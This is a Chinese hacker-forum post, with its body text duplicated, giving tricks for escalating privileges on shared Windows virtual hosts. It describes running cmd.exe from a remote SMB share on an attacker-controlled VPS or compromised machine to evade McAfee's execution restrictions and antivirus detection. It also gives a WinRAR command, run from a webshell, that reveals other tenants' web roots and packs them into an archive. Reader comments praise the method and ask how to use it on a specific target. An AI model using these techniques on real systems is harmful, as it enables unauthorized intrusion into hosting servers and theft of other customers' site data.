虚拟主机提权
是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?
原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。
下面是个人的小技巧:
0x01: 是否大家会想到调用远程路径去执行CMD,比如(\\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:
1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活GUEST用户,在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典,所在共享目录程序给Everyone权限,如图:
2:还要注意一点就是你要提权的机器能去访问你自己VPS的445端口,想知道能不能访问可以在SHELL上扫一下(如果不能,他肯定能去访问C段中机器的共享,明白啥意思了?)
0x02:这里提到的第二个小技巧就是利用WINRAR,应该有些人已经会用他去列目录了,(这个方法就是你实在提不了,补丁很全,要么就是杀软很牛,而免杀不是你的强项,如果你想跨目录弄到目标站),首先在目标站找个图片地址,
然后shell里面C:\progra~1\WinRAR\Rar.exe a -k -r -s -m1 c:\windows\temp\xx.rar E:\freehost\xxxasd5612asdfdsafsaf.jpg,这样shell中会回显你打包成功,目标网站根路径会显示出来,然后你打包网站根路径,会将网站所有目录列出来,你们可能会问,都是虚拟权限你怎么过去,可是我测试了星外,新网的虚拟主机,都成功列出目录并打包。。
就是提权的一点小技巧,大牛勿喷。
回头一看,文笔真烂,算了,不改了,老婆催睡觉了,各位黑阔们,晚安。。。。。。。。。
原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。
下面是个人的小技巧:
0x01: 是否大家会想到调用远程路径去执行CMD,比如(\\x.x.x.x\test\cmd.exe),经过我的测试是可以成功的,而且就算你EXP不免杀,杀软也不会提示!当时记得我有个T00LS的朋友找提权,也是这种情况,当时帮他解决了。调用远程路径的时候要注意一下几点:
1:找一台自己的VPS或者打下来的肉鸡,自己的机器需要开启445端口,激活GUEST用户,在组策略中将 网络访问: 本地帐户的共享和安全模型 改为经典,所在共享目录程序给Everyone权限,如图:
2:还要注意一点就是你要提权的机器能去访问你自己VPS的445端口,想知道能不能访问可以在SHELL上扫一下(如果不能,他肯定能去访问C段中机器的共享,明白啥意思了?)
0x02:这里提到的第二个小技巧就是利用WINRAR,应该有些人已经会用他去列目录了,(这个方法就是你实在提不了,补丁很全,要么就是杀软很牛,而免杀不是你的强项,如果你想跨目录弄到目标站),首先在目标站找个图片地址,
然后shell里面C:\progra~1\WinRAR\Rar.exe a -k -r -s -m1 c:\windows\temp\xx.rar E:\freehost\xxxasd5612asdfdsafsaf.jpg,这样shell中会回显你打包成功,目标网站根路径会显示出来,然后你打包网站根路径,会将网站所有目录列出来,你们可能会问,都是虚拟权限你怎么过去,可是我测试了星外,新网的虚拟主机,都成功列出目录并打包。。
就是提权的一点小技巧,大牛勿喷。
回头一看,文笔真烂,算了,不改了,老婆催睡觉了,各位黑阔们,晚安。。。。。。。。。
评论183次
莫非兄台跟我的想法一样?
\这几天测试了几个站,,都成功了。。。。。不错啊。
思路很好 MARK
哈哈,rar.exe价值永不值此
这思路真心不错哦 ,小细节,偶就是没有想到。。
这个有用。嘿嘿
好东西不错!!!!
思路收下了! 谢谢分享
还可以酱紫!!thx!
不错,mark一下
很实用的,在用。。
思路很好,尤其是winrar,好,赶紧测试一下试试。
思路不错 mark下。
牛淫
星外a站拿下shell,路径为d:\wwww\1\ ,B站路径未知,只知道上面有1qaz.jpg这个文件。这样是否可利用rar找到目录并打包
mark 这个技巧不错 记录下啦
学xi
好YD的技巧..
mark
没听说过这样也可以,管理应该给个原创